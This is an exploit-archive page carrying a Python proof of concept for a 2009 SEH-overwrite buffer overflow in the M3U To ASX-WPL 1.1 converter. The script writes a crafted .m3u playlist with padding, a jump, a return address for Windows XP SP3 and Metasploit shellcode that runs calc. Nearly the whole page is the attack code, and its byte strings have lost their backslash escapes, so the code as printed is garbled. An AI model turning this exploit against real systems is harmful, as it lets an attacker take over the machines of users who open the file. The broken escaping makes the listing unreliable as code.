M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit
# Published : 2009-12-05
# Author : Encrypt3d.M!Nd
# Previous Title : IDEAL Administration 2009 v9.7 Local Buffer Overflow Exploit
# Next Title : HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit

#exploit.py
#
#    M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit
#    By: Encrypt3d.M!Nd
#    http://m1nd3d.wordpress.com/
#
#################################################################
#
# SEH Overwrite method - you can use simple jmp esp
# accourding to my calculations EIP Would Change after
# 1378 bytes.it may be diffrent on other systems.
#

ns = "xebx15x90x90"
sh = "xbex2exd1x72" # Windows XP sp3 - msacm32.drv

#
#windows/exec - 461 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#EXITFUNC=thread, CMD=calc
#

shellcode = (
"x89xe2xdaxc4xd9x72xf4x5bx53x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4bx39x43x30"
"x43x30x43x30x45x30x4bx39x4bx55x46x51x49x42x42"
"x44x4cx4bx51x42x50x30x4cx4bx51x42x44x4cx4cx4b"
"x51x42x42x34x4cx4bx44x32x46x48x44x4fx48x37x50"
"x4ax51x36x46x51x4bx4fx46x51x49x50x4ex4cx47x4c"
"x45x31x43x4cx43x32x46x4cx47x50x49x51x48x4fx44"
"x4dx43x31x48x47x4ax42x4ax50x46x32x46x37x4cx4b"
"x50x52x42x30x4cx4bx47x32x47x4cx45x51x4ex30x4c"
"x4bx51x50x42x58x4cx45x4fx30x42x54x51x5ax45x51"
"x48x50x50x50x4cx4bx47x38x44x58x4cx4bx50x58x47"
"x50x45x51x48x53x4ax43x47x4cx47x39x4cx4bx46x54"
"x4cx4bx43x31x49x46x46x51x4bx4fx46x51x4fx30x4e"
"x4cx49x51x48x4fx44x4dx43x31x4fx37x46x58x4bx50"
"x43x45x4bx44x45x53x43x4dx4ax58x47x4bx43x4dx51"
"x34x43x45x4bx52x46x38x4cx4bx51x48x51x34x45x51"
"x4ex33x42x46x4cx4bx44x4cx50x4bx4cx4bx46x38x45"
"x4cx45x51x48x53x4cx4bx43x34x4cx4bx43x31x4ex30"
"x4dx59x47x34x47x54x46x44x51x4bx51x4bx43x51x46"
"x39x51x4ax50x51x4bx4fx4dx30x46x38x51x4fx51x4a"
"x4cx4bx44x52x4ax4bx4bx36x51x4dx43x5ax45x51x4c"
"x4dx4dx55x4fx49x45x50x43x30x45x50x46x30x42x48"
"x46x51x4cx4bx42x4fx4dx57x4bx4fx49x45x4fx4bx4d"
"x30x45x4dx47x5ax44x4ax43x58x4fx56x4cx55x4fx4d"
"x4dx4dx4bx4fx4ex35x47x4cx43x36x43x4cx44x4ax4d"
"x50x4bx4bx4dx30x42x55x45x55x4fx4bx51x57x42x33"
"x42x52x42x4fx43x5ax45x50x51x43x4bx4fx4ex35x42"
"x43x43x51x42x4cx42x43x43x30x41x41")

file=open('m3utoasx.m3u','w')
file.write("x41" * 1386+ns+sh+"x41" * 30+shellcode)
file.close()